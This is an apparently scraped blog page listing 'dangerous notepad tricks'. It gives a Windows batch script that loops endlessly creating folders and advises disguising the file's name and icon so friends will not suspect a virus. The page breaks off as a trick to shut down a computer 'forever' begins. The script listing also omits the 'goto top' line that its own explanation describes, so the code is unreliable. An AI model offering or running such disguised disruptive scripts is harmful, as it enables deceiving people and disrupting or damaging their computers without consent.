Something New... Try searching this on Google ...Just copy and paste in search bar :- sqrt(cos(x))cos(300x)+sqrt(abs(x))-0.7)(4-x*x)^0.01,sqrt(6-x^2), -sqrt(6-x^2) from -4.5 to 4.5
Posts
Showing posts from March, 2017
- Get link
- X
- Other Apps
Top 5 most Dangerous notepad Tricks SOME DANGEROUS AND DEADLY TRICKS DO NOT TRY THESE FOR FUN!! 1. How to create more than 3,000 folders under a minute 1) Open your notepad and type the following code. @echo off :top md %random% 2) Save it as 1000.bat @echo off makes your screen appear blank but it is actually making hundreds of folders. md %random% is command that creating folders with random names.( md is a command to make directory in ms-dos) goto top – return the command to :top, causes an infinite loop. NOTE: The folders will get created in the directory where you saved the ”1000.bat” file. The file might look suspicious to your friends. So if you are looking to fool your friends, then change the file name and also the icon so that he doesn’t suspect the file to be a virus. ——————————————————————————— ——————————————————– 2. How to Shutdown a computer forever? Now Please don’t try this because t...